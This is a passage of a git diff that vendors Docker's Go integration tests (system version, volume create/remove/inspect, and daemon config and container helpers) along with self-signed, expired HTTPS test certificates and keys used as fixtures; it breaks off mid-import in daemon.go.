+
+	testEnv.Print()
+	os.Exit(m.Run())
+}
+
+func setupTest(t *testing.T) func() {
+	environment.ProtectAll(t, testEnv)
+	return func() { testEnv.Clean(t) }
+}
diff --git a/vendor/github.com/docker/docker/integration/system/version_test.go b/vendor/github.com/docker/docker/integration/system/version_test.go
new file mode 100644
index 0000000000..8904c09b26
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/system/version_test.go
@@ -0,0 +1,23 @@
+package system // import "github.com/docker/docker/integration/system"
+
+import (
+	"context"
+	"testing"
+
+	"github.com/docker/docker/internal/test/request"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestVersion(t *testing.T) {
+	client := request.NewAPIClient(t)
+
+	version, err := client.ServerVersion(context.Background())
+	assert.NilError(t, err)
+
+	assert.Check(t, version.APIVersion != "")
+	assert.Check(t, version.Version != "")
+	assert.Check(t, version.MinAPIVersion != "")
+	assert.Check(t, is.Equal(testEnv.DaemonInfo.ExperimentalBuild, version.Experimental))
+	assert.Check(t, is.Equal(testEnv.OSType, version.Os))
+}
diff --git a/vendor/github.com/docker/docker/integration/testdata/https/ca.pem b/vendor/github.com/docker/docker/integration/testdata/https/ca.pem
new file mode 100644
index 0000000000..6825d6d1bd
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/testdata/https/ca.pem
@@ -0,0 +1,23 @@
+-----BEGIN CERTIFICATE-----
+MIID0TCCAzqgAwIBAgIJAP2r7GqEJwSnMA0GCSqGSIb3DQEBBQUAMIGiMQswCQYD
+VQQGEwJVUzELMAkGA1UECBMCQ0ExFTATBgNVBAcTDFNhbkZyYW5jaXNjbzEVMBMG
+A1UEChMMRm9ydC1GdW5zdG9uMREwDwYDVQQLEwhjaGFuZ2VtZTERMA8GA1UEAxMI
+Y2hhbmdlbWUxETAPBgNVBCkTCGNoYW5nZW1lMR8wHQYJKoZIhvcNAQkBFhBtYWls
+QGhvc3QuZG9tYWluMB4XDTEzMTIwMzE2NTYzMFoXDTIzMTIwMTE2NTYzMFowgaIx
+CzAJBgNVBAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2Nv
+MRUwEwYDVQQKEwxGb3J0LUZ1bnN0b24xETAPBgNVBAsTCGNoYW5nZW1lMREwDwYD
+VQQDEwhjaGFuZ2VtZTERMA8GA1UEKRMIY2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEW
+EG1haWxAaG9zdC5kb21haW4wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBALAn
+0xDw+5y7ZptQacq66pUhRu82JP2WU6IDgo5QUtNU6/CX5PwQATe/OnYTZQFbksxp
+AU9boG0FCkgxfsgPYXEuZxVEGKI2fxfKHOZZI8mrkWmj6eWU/0cvCjGVc9rTITP5
+sNQvg+hORyVDdNp2IdsbMJayiB3AQYMFx3vSDOMTAgMBAAGjggELMIIBBzAdBgNV
+HQ4EFgQUZu7DFz09q0QBa2+ymRm9qgK1NPswgdcGA1UdIwSBzzCBzIAUZu7DFz09
+q0QBa2+ymRm9qgK1NPuhgaikgaUwgaIxCzAJBgNVBAYTAlVTMQswCQYDVQQIEwJD
+QTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMRUwEwYDVQQKEwxGb3J0LUZ1bnN0b24x
+ETAPBgNVBAsTCGNoYW5nZW1lMREwDwYDVQQDEwhjaGFuZ2VtZTERMA8GA1UEKRMI
+Y2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEWEG1haWxAaG9zdC5kb21haW6CCQD9q+xq
+hCcEpzAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA4GBAF8fJKKM+/oOdnNi
+zEd0M1+PmZOyqvjYQn/2ZR8UHH6Imgc/OPQKZXf0bVE1Txc/DaUNn9Isd1SuCuaE
+ic3vAIYYU7PmgeNN6vwec48V96T7jr+GAi6AVMhQEc2hHCfVtx11Xx+x6aHDZzJt
+Zxtf5lL6KSO9Y+EFwM+rju6hm5hW
+-----END CERTIFICATE-----
diff --git a/vendor/github.com/docker/docker/integration/testdata/https/client-cert.pem b/vendor/github.com/docker/docker/integration/testdata/https/client-cert.pem
new file mode 100644
index 0000000000..c05ed47c2c
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/testdata/https/client-cert.pem
@@ -0,0 +1,73 @@
+Certificate:
+    Data:
+        Version: 3 (0x2)
+        Serial Number: 3 (0x3)
+    Signature Algorithm: sha1WithRSAEncryption
+        Issuer: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=changeme/name=changeme/emailAddress=mail@host.domain
+        Validity
+            Not Before: Dec  4 14:17:54 2013 GMT
+            Not After : Dec  2 14:17:54 2023 GMT
+        Subject: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=client/name=changeme/emailAddress=mail@host.domain
+        Subject Public Key Info:
+            Public Key Algorithm: rsaEncryption
+                Public-Key: (1024 bit)
+                Modulus:
+                    00:ca:c9:05:d0:09:4e:3e:a4:fc:d5:14:f4:a5:e8:
+                    34:d3:6b:51:e3:f3:62:ea:a1:f0:e8:ed:c4:2a:bc:
+                    f0:4f:ca:07:df:e3:88:fa:f4:21:99:35:0e:3d:ea:
+                    b0:86:e7:c4:d2:8a:83:2b:42:b8:ec:a3:99:62:70:
+                    81:46:cc:fc:a5:1d:d2:63:e8:eb:07:25:9a:e2:25:
+                    6d:11:56:f2:1a:51:a1:b6:3e:1c:57:32:e9:7b:2c:
+                    aa:1b:cc:97:2d:89:2d:b1:c9:5e:35:28:4d:7c:fa:
+                    65:31:3e:f7:70:dd:6e:0b:3c:58:af:a8:2e:24:c0:
+                    7e:4e:78:7d:0a:9e:8f:42:43
+                Exponent: 65537 (0x10001)
+        X509v3 extensions:
+            X509v3 Basic Constraints: 
+                CA:FALSE
+            Netscape Comment: 
+                Easy-RSA Generated Certificate
+            X509v3 Subject Key Identifier: 
+                DE:42:EF:2D:98:A3:6C:A8:AA:E0:8C:71:2C:9D:64:23:A9:E2:7E:81
+            X509v3 Authority Key Identifier: 
+                keyid:66:EE:C3:17:3D:3D:AB:44:01:6B:6F:B2:99:19:BD:AA:02:B5:34:FB
+                DirName:/C=US/ST=CA/L=SanFrancisco/O=Fort-Funston/OU=changeme/CN=changeme/name=changeme/emailAddress=mail@host.domain
+                serial:FD:AB:EC:6A:84:27:04:A7
+
+            X509v3 Extended Key Usage: 
+                TLS Web Client Authentication
+            X509v3 Key Usage: 
+                Digital Signature
+    Signature Algorithm: sha1WithRSAEncryption
+         1c:44:26:ea:e1:66:25:cb:e4:8e:57:1c:f6:b9:17:22:62:40:
+         12:90:8f:3b:b2:61:7a:54:94:8f:b1:20:0b:bf:a3:51:e3:fa:
+         1c:a1:be:92:3a:d0:76:44:c0:57:83:ab:6a:e4:1a:45:49:a4:
+         af:39:0d:60:32:fc:3a:be:d7:fb:5d:99:7a:1f:87:e7:d5:ab:
+         84:a2:5e:90:d8:bf:fa:89:6d:32:26:02:5e:31:35:68:7f:31:
+         f5:6b:51:46:bc:af:70:ed:5a:09:7d:ec:b2:48:4f:fe:c5:2f:
+         56:04:ad:f6:c1:d2:2a:e4:6a:c4:87:fe:08:35:c5:38:cb:5e:
+         4a:c4
+-----BEGIN CERTIFICATE-----
+MIIEFTCCA36gAwIBAgIBAzANBgkqhkiG9w0BAQUFADCBojELMAkGA1UEBhMCVVMx
+CzAJBgNVBAgTAkNBMRUwEwYDVQQHEwxTYW5GcmFuY2lzY28xFTATBgNVBAoTDEZv
+cnQtRnVuc3RvbjERMA8GA1UECxMIY2hhbmdlbWUxETAPBgNVBAMTCGNoYW5nZW1l
+MREwDwYDVQQpEwhjaGFuZ2VtZTEfMB0GCSqGSIb3DQEJARYQbWFpbEBob3N0LmRv
+bWFpbjAeFw0xMzEyMDQxNDE3NTRaFw0yMzEyMDIxNDE3NTRaMIGgMQswCQYDVQQG
+EwJVUzELMAkGA1UECBMCQ0ExFTATBgNVBAcTDFNhbkZyYW5jaXNjbzEVMBMGA1UE
+ChMMRm9ydC1GdW5zdG9uMREwDwYDVQQLEwhjaGFuZ2VtZTEPMA0GA1UEAxMGY2xp
+ZW50MREwDwYDVQQpEwhjaGFuZ2VtZTEfMB0GCSqGSIb3DQEJARYQbWFpbEBob3N0
+LmRvbWFpbjCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAyskF0AlOPqT81RT0
+peg002tR4/Ni6qHw6O3EKrzwT8oH3+OI+vQhmTUOPeqwhufE0oqDK0K47KOZYnCB
+Rsz8pR3SY+jrByWa4iVtEVbyGlGhtj4cVzLpeyyqG8yXLYktscleNShNfPplMT73
+cN1uCzxYr6guJMB+Tnh9Cp6PQkMCAwEAAaOCAVkwggFVMAkGA1UdEwQCMAAwLQYJ
+YIZIAYb4QgENBCAWHkVhc3ktUlNBIEdlbmVyYXRlZCBDZXJ0aWZpY2F0ZTAdBgNV
+HQ4EFgQU3kLvLZijbKiq4IxxLJ1kI6nifoEwgdcGA1UdIwSBzzCBzIAUZu7DFz09
+q0QBa2+ymRm9qgK1NPuhgaikgaUwgaIxCzAJBgNVBAYTAlVTMQswCQYDVQQIEwJD
+QTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMRUwEwYDVQQKEwxGb3J0LUZ1bnN0b24x
+ETAPBgNVBAsTCGNoYW5nZW1lMREwDwYDVQQDEwhjaGFuZ2VtZTERMA8GA1UEKRMI
+Y2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEWEG1haWxAaG9zdC5kb21haW6CCQD9q+xq
+hCcEpzATBgNVHSUEDDAKBggrBgEFBQcDAjALBgNVHQ8EBAMCB4AwDQYJKoZIhvcN
+AQEFBQADgYEAHEQm6uFmJcvkjlcc9rkXImJAEpCPO7JhelSUj7EgC7+jUeP6HKG+
+kjrQdkTAV4OrauQaRUmkrzkNYDL8Or7X+12Zeh+H59WrhKJekNi/+oltMiYCXjE1
+aH8x9WtRRryvcO1aCX3sskhP/sUvVgSt9sHSKuRqxIf+CDXFOMteSsQ=
+-----END CERTIFICATE-----
diff --git a/vendor/github.com/docker/docker/integration/testdata/https/client-key.pem b/vendor/github.com/docker/docker/integration/testdata/https/client-key.pem
new file mode 100644
index 0000000000..b5c15f8dc7
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/testdata/https/client-key.pem
@@ -0,0 +1,16 @@
+-----BEGIN PRIVATE KEY-----
+MIICdQIBADANBgkqhkiG9w0BAQEFAASCAl8wggJbAgEAAoGBAMrJBdAJTj6k/NUU
+9KXoNNNrUePzYuqh8OjtxCq88E/KB9/jiPr0IZk1Dj3qsIbnxNKKgytCuOyjmWJw
+gUbM/KUd0mPo6wclmuIlbRFW8hpRobY+HFcy6XssqhvMly2JLbHJXjUoTXz6ZTE+
+93Ddbgs8WK+oLiTAfk54fQqej0JDAgMBAAECgYBOFEzKp2qbMEexe9ofL2N3rDDh
+xkrl8OijpzkLA6i78BxMFn4dsnZlWUpciMrjhsYAExkiRRSS+QMMJimAq1jzQqc3
+FAQV2XGYwkd0cUn7iZGvfNnEPysjsfyYQM+m+sT0ATj4BZjVShC6kkSjTdm1leLN
+OSvcHdcu3Xxg9ufF0QJBAPYdnNt5sIndt2WECePuRVi+uF4mlxTobFY0fjn26yhC
+4RsnhhD3Vldygo9gvnkwrAZYaALGSPBewes2InxvjA8CQQDS7erKiNXpwoqz5XiU
+SVEsIIVTdWzBjGbIqMOu/hUwM5FK4j6JTBks0aTGMyh0YV9L1EzM0X79J29JahCe
+iQKNAkBKNMOGqTpBV0hko1sYDk96YobUXG5RL4L6uvkUIQ7mJMQam+AgXXL7Ctuy
+v0iu4a38e8tgisiTMP7nHHtpaXihAkAOiN54/lzfMsykANgCP9scE1GcoqbP34Dl
+qttxH4kOPT9xzY1JoLjLYdbc4YGUI3GRpBt2sajygNkmUey7P+2xAkBBsVCZFvTw
+qHvOpPS2kX5ml5xoc/QAHK9N7kR+X7XFYx82RTVSqJEK4lPb+aEWn+CjiIewO4Q5
+ksDFuNxAzbhl
+-----END PRIVATE KEY-----
diff --git a/vendor/github.com/docker/docker/integration/testdata/https/server-cert.pem b/vendor/github.com/docker/docker/integration/testdata/https/server-cert.pem
new file mode 100644
index 0000000000..08abfd1a3b
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/testdata/https/server-cert.pem
@@ -0,0 +1,76 @@
+Certificate:
+    Data:
+        Version: 3 (0x2)
+        Serial Number: 4 (0x4)
+    Signature Algorithm: sha1WithRSAEncryption
+        Issuer: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=changeme/name=changeme/emailAddress=mail@host.domain
+        Validity
+            Not Before: Dec  4 15:01:20 2013 GMT
+            Not After : Dec  2 15:01:20 2023 GMT
+        Subject: C=US, ST=CA, L=SanFrancisco, O=Fort-Funston, OU=changeme, CN=*/name=changeme/emailAddress=mail@host.domain
+        Subject Public Key Info:
+            Public Key Algorithm: rsaEncryption
+                Public-Key: (1024 bit)
+                Modulus:
+                    00:c1:ff:7d:30:6f:64:4a:b1:92:b1:71:d1:c1:74:
+                    e2:1d:db:2d:11:24:e1:00:d4:00:ae:6f:c8:9e:ae:
+                    67:b3:4a:bd:f7:e6:9e:57:6d:19:4c:3c:23:94:2d:
+                    3d:d6:63:84:d8:fa:76:2b:38:12:c1:ed:20:9d:32:
+                    e0:e8:c2:bf:9a:77:70:04:3f:7f:ca:8c:2c:82:d6:
+                    3d:25:5c:02:1a:4f:64:93:03:dd:9c:42:97:5e:09:
+                    49:af:f0:c2:e1:30:08:0e:21:46:95:d1:13:59:c0:
+                    c8:76:be:94:0d:8b:43:67:21:33:b2:08:60:9d:76:
+                    a8:05:32:1e:f9:95:09:14:75
+                Exponent: 65537 (0x10001)
+        X509v3 extensions:
+            X509v3 Basic Constraints: 
+                CA:FALSE
+            Netscape Cert Type: 
+                SSL Server
+            Netscape Comment: 
+                Easy-RSA Generated Server Certificate
+            X509v3 Subject Key Identifier: 
+                14:02:FD:FD:DD:13:38:E0:71:EA:D1:BE:C0:0E:89:1A:2D:B6:19:06
+            X509v3 Authority Key Identifier: 
+                keyid:66:EE:C3:17:3D:3D:AB:44:01:6B:6F:B2:99:19:BD:AA:02:B5:34:FB
+                DirName:/C=US/ST=CA/L=SanFrancisco/O=Fort-Funston/OU=changeme/CN=changeme/name=changeme/emailAddress=mail@host.domain
+                serial:FD:AB:EC:6A:84:27:04:A7
+
+            X509v3 Extended Key Usage: 
+                TLS Web Server Authentication
+            X509v3 Key Usage: 
+                Digital Signature, Key Encipherment
+    Signature Algorithm: sha1WithRSAEncryption
+         40:0f:10:39:c4:b7:0f:0d:2f:bf:d2:16:cc:8e:d3:9a:fb:8b:
+         ce:4b:7b:0d:48:77:ce:f1:fe:d5:8f:ea:b1:71:ed:49:1d:9f:
+         23:3a:16:d4:70:7c:c5:29:bf:e4:90:34:d0:f0:00:24:f4:e4:
+         df:2c:c3:83:01:66:61:c9:a8:ab:29:e7:98:6d:27:89:4a:76:
+         c9:2e:19:8e:fe:6e:d5:f8:99:11:0e:97:67:4b:34:e3:1e:e3:
+         9f:35:00:a5:32:f9:b5:2c:f2:e0:c5:2e:cc:81:bd:18:dd:5c:
+         12:c8:6b:fa:0c:17:74:30:55:f6:6e:20:9a:6c:1e:09:b4:0c:
+         15:42
+-----BEGIN CERTIFICATE-----
+MIIEKjCCA5OgAwIBAgIBBDANBgkqhkiG9w0BAQUFADCBojELMAkGA1UEBhMCVVMx
+CzAJBgNVBAgTAkNBMRUwEwYDVQQHEwxTYW5GcmFuY2lzY28xFTATBgNVBAoTDEZv
+cnQtRnVuc3RvbjERMA8GA1UECxMIY2hhbmdlbWUxETAPBgNVBAMTCGNoYW5nZW1l
+MREwDwYDVQQpEwhjaGFuZ2VtZTEfMB0GCSqGSIb3DQEJARYQbWFpbEBob3N0LmRv
+bWFpbjAeFw0xMzEyMDQxNTAxMjBaFw0yMzEyMDIxNTAxMjBaMIGbMQswCQYDVQQG
+EwJVUzELMAkGA1UECBMCQ0ExFTATBgNVBAcTDFNhbkZyYW5jaXNjbzEVMBMGA1UE
+ChMMRm9ydC1GdW5zdG9uMREwDwYDVQQLEwhjaGFuZ2VtZTEKMAgGA1UEAxQBKjER
+MA8GA1UEKRMIY2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEWEG1haWxAaG9zdC5kb21h
+aW4wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMH/fTBvZEqxkrFx0cF04h3b
+LREk4QDUAK5vyJ6uZ7NKvffmnldtGUw8I5QtPdZjhNj6dis4EsHtIJ0y4OjCv5p3
+cAQ/f8qMLILWPSVcAhpPZJMD3ZxCl14JSa/wwuEwCA4hRpXRE1nAyHa+lA2LQ2ch
+M7IIYJ12qAUyHvmVCRR1AgMBAAGjggFzMIIBbzAJBgNVHRMEAjAAMBEGCWCGSAGG
++EIBAQQEAwIGQDA0BglghkgBhvhCAQ0EJxYlRWFzeS1SU0EgR2VuZXJhdGVkIFNl
+cnZlciBDZXJ0aWZpY2F0ZTAdBgNVHQ4EFgQUFAL9/d0TOOBx6tG+wA6JGi22GQYw
+gdcGA1UdIwSBzzCBzIAUZu7DFz09q0QBa2+ymRm9qgK1NPuhgaikgaUwgaIxCzAJ
+BgNVBAYTAlVTMQswCQYDVQQIEwJDQTEVMBMGA1UEBxMMU2FuRnJhbmNpc2NvMRUw
+EwYDVQQKEwxGb3J0LUZ1bnN0b24xETAPBgNVBAsTCGNoYW5nZW1lMREwDwYDVQQD
+EwhjaGFuZ2VtZTERMA8GA1UEKRMIY2hhbmdlbWUxHzAdBgkqhkiG9w0BCQEWEG1h
+aWxAaG9zdC5kb21haW6CCQD9q+xqhCcEpzATBgNVHSUEDDAKBggrBgEFBQcDATAL
+BgNVHQ8EBAMCBaAwDQYJKoZIhvcNAQEFBQADgYEAQA8QOcS3Dw0vv9IWzI7TmvuL
+zkt7DUh3zvH+1Y/qsXHtSR2fIzoW1HB8xSm/5JA00PAAJPTk3yzDgwFmYcmoqynn
+mG0niUp2yS4Zjv5u1fiZEQ6XZ0s04x7jnzUApTL5tSzy4MUuzIG9GN1cEshr+gwX
+dDBV9m4gmmweCbQMFUI=
+-----END CERTIFICATE-----
diff --git a/vendor/github.com/docker/docker/integration/testdata/https/server-key.pem b/vendor/github.com/docker/docker/integration/testdata/https/server-key.pem
new file mode 100644
index 0000000000..c269320ef0
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/testdata/https/server-key.pem
@@ -0,0 +1,16 @@
+-----BEGIN PRIVATE KEY-----
+MIICeAIBADANBgkqhkiG9w0BAQEFAASCAmIwggJeAgEAAoGBAMH/fTBvZEqxkrFx
+0cF04h3bLREk4QDUAK5vyJ6uZ7NKvffmnldtGUw8I5QtPdZjhNj6dis4EsHtIJ0y
+4OjCv5p3cAQ/f8qMLILWPSVcAhpPZJMD3ZxCl14JSa/wwuEwCA4hRpXRE1nAyHa+
+lA2LQ2chM7IIYJ12qAUyHvmVCRR1AgMBAAECgYAmwckb9RUfSwyYgLm8IYLPHiuJ
+wkllZfVg5Bo7gXJcQnFjZmJ56uTj8xvUjZlODIHM63TSO5ibv6kFXtXKCqZGd2M+
+wGbhZ0f+2GvKcwMmJERnIQjuoNaYSQLT0tM0VB9Iz0rJlZC+tzPZ+5pPqEumRdsS
+IzWNXfF42AhcbwAQYQJBAPVXtMYIJc9EZsz86ZcQiMPWUpCX5vnRmtwL8kKyR8D5
+4KfYeiowyFffSRMMcclwNHq7TgSXN+nIXM9WyzyzwikCQQDKbNA28AgZp9aT54HP
+WnbeE2pmt+uk/zl/BtxJSoK6H+69Jec+lf7EgL7HgOWYRSNot4uQWu8IhsHLTiUq
++0FtAkEAqwlRxRy4/x24bP+D+QRV0/D97j93joFJbE4Hved7jlSlAV4xDGilwlyv
+HNB4Iu5OJ6Gcaibhm+FKkmD3noHSwQJBAIpu3fokLzX0bS+bDFBU6qO3HXX/47xj
++tsfQvkwZrSI8AkU6c8IX0HdVhsz0FBRQAT2ORDQz1XCarfxykNZrwUCQQCGCBIc
+BBCWzhHlswlGidWJg3HqqO6hPPClEr3B5G87oCsdeYwiO23XT6rUnoJXfJHp6oCW
+5nCwDu5ZTP+khltg
+-----END PRIVATE KEY-----
diff --git a/vendor/github.com/docker/docker/integration/volume/main_test.go b/vendor/github.com/docker/docker/integration/volume/main_test.go
new file mode 100644
index 0000000000..206f7377ae
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/volume/main_test.go
@@ -0,0 +1,33 @@
+package volume // import "github.com/docker/docker/integration/volume"
+
+import (
+	"fmt"
+	"os"
+	"testing"
+
+	"github.com/docker/docker/internal/test/environment"
+)
+
+var testEnv *environment.Execution
+
+func TestMain(m *testing.M) {
+	var err error
+	testEnv, err = environment.New()
+	if err != nil {
+		fmt.Println(err)
+		os.Exit(1)
+	}
+	err = environment.EnsureFrozenImagesLinux(testEnv)
+	if err != nil {
+		fmt.Println(err)
+		os.Exit(1)
+	}
+
+	testEnv.Print()
+	os.Exit(m.Run())
+}
+
+func setupTest(t *testing.T) func() {
+	environment.ProtectAll(t, testEnv)
+	return func() { testEnv.Clean(t) }
+}
diff --git a/vendor/github.com/docker/docker/integration/volume/volume_test.go b/vendor/github.com/docker/docker/integration/volume/volume_test.go
new file mode 100644
index 0000000000..ce42bb3040
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration/volume/volume_test.go
@@ -0,0 +1,116 @@
+package volume
+
+import (
+	"context"
+	"fmt"
+	"strings"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	volumetypes "github.com/docker/docker/api/types/volume"
+	"github.com/docker/docker/integration/internal/container"
+	"github.com/docker/docker/internal/test/request"
+	"github.com/google/go-cmp/cmp/cmpopts"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+	"gotest.tools/skip"
+)
+
+func TestVolumesCreateAndList(t *testing.T) {
+	skip.If(t, testEnv.IsRemoteDaemon, "cannot run daemon when remote daemon")
+	defer setupTest(t)()
+	client := request.NewAPIClient(t)
+	ctx := context.Background()
+
+	name := t.Name()
+	vol, err := client.VolumeCreate(ctx, volumetypes.VolumeCreateBody{
+		Name: name,
+	})
+	assert.NilError(t, err)
+
+	expected := types.Volume{
+		// Ignore timestamp of CreatedAt
+		CreatedAt:  vol.CreatedAt,
+		Driver:     "local",
+		Scope:      "local",
+		Name:       name,
+		Mountpoint: fmt.Sprintf("%s/volumes/%s/_data", testEnv.DaemonInfo.DockerRootDir, name),
+	}
+	assert.Check(t, is.DeepEqual(vol, expected, cmpopts.EquateEmpty()))
+
+	volumes, err := client.VolumeList(ctx, filters.Args{})
+	assert.NilError(t, err)
+
+	assert.Check(t, is.Equal(len(volumes.Volumes), 1))
+	assert.Check(t, volumes.Volumes[0] != nil)
+	assert.Check(t, is.DeepEqual(*volumes.Volumes[0], expected, cmpopts.EquateEmpty()))
+}
+
+func TestVolumesRemove(t *testing.T) {
+	defer setupTest(t)()
+	client := request.NewAPIClient(t)
+	ctx := context.Background()
+
+	prefix, slash := getPrefixAndSlashFromDaemonPlatform()
+
+	id := container.Create(t, ctx, client, container.WithVolume(prefix+slash+"foo"))
+
+	c, err := client.ContainerInspect(ctx, id)
+	assert.NilError(t, err)
+	vname := c.Mounts[0].Name
+
+	err = client.VolumeRemove(ctx, vname, false)
+	assert.Check(t, is.ErrorContains(err, "volume is in use"))
+
+	err = client.ContainerRemove(ctx, id, types.ContainerRemoveOptions{
+		Force: true,
+	})
+	assert.NilError(t, err)
+
+	err = client.VolumeRemove(ctx, vname, false)
+	assert.NilError(t, err)
+}
+
+func TestVolumesInspect(t *testing.T) {
+	skip.If(t, testEnv.IsRemoteDaemon, "cannot run daemon when remote daemon")
+	defer setupTest(t)()
+	client := request.NewAPIClient(t)
+	ctx := context.Background()
+
+	// sampling current time minus a minute so to now have false positive in case of delays
+	now := time.Now().Truncate(time.Minute)
+
+	name := t.Name()
+	_, err := client.VolumeCreate(ctx, volumetypes.VolumeCreateBody{
+		Name: name,
+	})
+	assert.NilError(t, err)
+
+	vol, err := client.VolumeInspect(ctx, name)
+	assert.NilError(t, err)
+
+	expected := types.Volume{
+		// Ignore timestamp of CreatedAt
+		CreatedAt:  vol.CreatedAt,
+		Driver:     "local",
+		Scope:      "local",
+		Name:       name,
+		Mountpoint: fmt.Sprintf("%s/volumes/%s/_data", testEnv.DaemonInfo.DockerRootDir, name),
+	}
+	assert.Check(t, is.DeepEqual(vol, expected, cmpopts.EquateEmpty()))
+
+	// comparing CreatedAt field time for the new volume to now. Removing a minute from both to avoid false positive
+	testCreatedAt, err := time.Parse(time.RFC3339, strings.TrimSpace(vol.CreatedAt))
+	assert.NilError(t, err)
+	testCreatedAt = testCreatedAt.Truncate(time.Minute)
+	assert.Check(t, is.Equal(testCreatedAt.Equal(now), true), "Time Volume is CreatedAt not equal to current time")
+}
+
+func getPrefixAndSlashFromDaemonPlatform() (prefix, slash string) {
+	if testEnv.OSType == "windows" {
+		return "c:", `\`
+	}
+	return "", "/"
+}
diff --git a/vendor/github.com/docker/docker/internal/test/daemon/config.go b/vendor/github.com/docker/docker/internal/test/daemon/config.go
new file mode 100644
index 0000000000..ce99222b37
--- /dev/null
+++ b/vendor/github.com/docker/docker/internal/test/daemon/config.go
@@ -0,0 +1,82 @@
+package daemon
+
+import (
+	"context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/internal/test"
+	"gotest.tools/assert"
+)
+
+// ConfigConstructor defines a swarm config constructor
+type ConfigConstructor func(*swarm.Config)
+
+// CreateConfig creates a config given the specified spec
+func (d *Daemon) CreateConfig(t assert.TestingT, configSpec swarm.ConfigSpec) string {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	cli := d.NewClientT(t)
+	defer cli.Close()
+
+	scr, err := cli.ConfigCreate(context.Background(), configSpec)
+	assert.NilError(t, err)
+	return scr.ID
+}
+
+// ListConfigs returns the list of the current swarm configs
+func (d *Daemon) ListConfigs(t assert.TestingT) []swarm.Config {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	cli := d.NewClientT(t)
+	defer cli.Close()
+
+	configs, err := cli.ConfigList(context.Background(), types.ConfigListOptions{})
+	assert.NilError(t, err)
+	return configs
+}
+
+// GetConfig returns a swarm config identified by the specified id
+func (d *Daemon) GetConfig(t assert.TestingT, id string) *swarm.Config {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	cli := d.NewClientT(t)
+	defer cli.Close()
+
+	config, _, err := cli.ConfigInspectWithRaw(context.Background(), id)
+	assert.NilError(t, err)
+	return &config
+}
+
+// DeleteConfig removes the swarm config identified by the specified id
+func (d *Daemon) DeleteConfig(t assert.TestingT, id string) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	cli := d.NewClientT(t)
+	defer cli.Close()
+
+	err := cli.ConfigRemove(context.Background(), id)
+	assert.NilError(t, err)
+}
+
+// UpdateConfig updates the swarm config identified by the specified id
+// Currently, only label update is supported.
+func (d *Daemon) UpdateConfig(t assert.TestingT, id string, f ...ConfigConstructor) {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	cli := d.NewClientT(t)
+	defer cli.Close()
+
+	config := d.GetConfig(t, id)
+	for _, fn := range f {
+		fn(config)
+	}
+
+	err := cli.ConfigUpdate(context.Background(), config.ID, config.Version, config.Spec)
+	assert.NilError(t, err)
+}
diff --git a/vendor/github.com/docker/docker/internal/test/daemon/container.go b/vendor/github.com/docker/docker/internal/test/daemon/container.go
new file mode 100644
index 0000000000..3aa69e195c
--- /dev/null
+++ b/vendor/github.com/docker/docker/internal/test/daemon/container.go
@@ -0,0 +1,40 @@
+package daemon
+
+import (
+	"context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/internal/test"
+	"gotest.tools/assert"
+)
+
+// ActiveContainers returns the list of ids of the currently running containers
+func (d *Daemon) ActiveContainers(t assert.TestingT) []string {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	cli := d.NewClientT(t)
+	defer cli.Close()
+
+	containers, err := cli.ContainerList(context.Background(), types.ContainerListOptions{})
+	assert.NilError(t, err)
+
+	ids := make([]string, len(containers))
+	for i, c := range containers {
+		ids[i] = c.ID
+	}
+	return ids
+}
+
+// FindContainerIP returns the ip of the specified container
+func (d *Daemon) FindContainerIP(t assert.TestingT, id string) string {
+	if ht, ok := t.(test.HelperT); ok {
+		ht.Helper()
+	}
+	cli := d.NewClientT(t)
+	defer cli.Close()
+
+	i, err := cli.ContainerInspect(context.Background(), id)
+	assert.NilError(t, err)
+	return i.NetworkSettings.IPAddress
+}
diff --git a/vendor/github.com/docker/docker/internal/test/daemon/daemon.go b/vendor/github.com/docker/docker/internal/test/daemon/daemon.go
new file mode 100644
index 0000000000..98f1ee1b08
--- /dev/null
+++ b/vendor/github.com/docker/docker/internal/test/daemon/daemon.go
@@ -0,0 +1,681 @@
+package daemon // import "github.com/docker/docker/internal/test/daemon"
+
+import (
+	"context"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"strconv"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/events"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/internal/test"
+	"github.com/docker/docker/internal/test/request"
+	"github.com/docker/docker/opts"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/pkg/stringid"
